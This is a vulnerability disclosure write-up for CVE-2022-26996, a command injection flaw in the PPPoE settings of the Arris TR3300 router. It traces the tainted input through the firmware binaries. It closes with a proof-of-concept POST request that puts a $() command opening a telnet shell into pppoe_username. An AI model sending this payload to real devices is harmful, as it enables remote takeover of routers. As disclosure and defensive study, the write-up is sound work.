Headline
CVE-2022-26996: my_vuln/13.md at main · wudipjq/my_vuln
Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
ARRIS Vulnerability
Vendor:ARRIS
Product:TR3300
Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In setup.cgi binary:
In the router’s pppoe function(wan_pppoe.html), pppoe_username、pppoe_passwd、pppoe_servicename is directly passed by the attacker, so we can control the pppoe_username、pppoe_passwd、pppoe_servicename to attack the OS.
First, accept and process the content of the field(pppoe_username、pppoe_password、pppoe_service), and then call the function nvram_set to store this input.
In rc_apps binary:
As you can see here, in sub_40D424 function, the initial input will be extracted.
In sub_408290 function, save these unsafe user inputs in variable a2.
Call the function nv_set to store this input.
In start_ppp binary:
Eventually, in ftext function, the initial input will cause command injection.
Supplement
BUT!!!
When receiving user input, there are very strict checks. But we can use $() to bypass it!
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
PoC
We set pppoe_username as $(/usr/sbin/utelnetd -l /bin/sh -p 10005), and the router will excute it,such as:
POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 242 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wan_pppoe.html Upgrade-Insecure-Requests: 1
pppoe_enable=&pppoe_username=$(/usr/sbin/utelnetd -l /bin/sh -p 10005)&pppoe_passwd=abc123&pppoe_servicename=pjqwudi&pppoe_mtu=1492&h_pppoe_enable=enable&h_pppoe_dod=disable&todo=save&this_file=wan_pppoe.html&next_file=wan_pppoe.html&message=
Result
Get a shell!
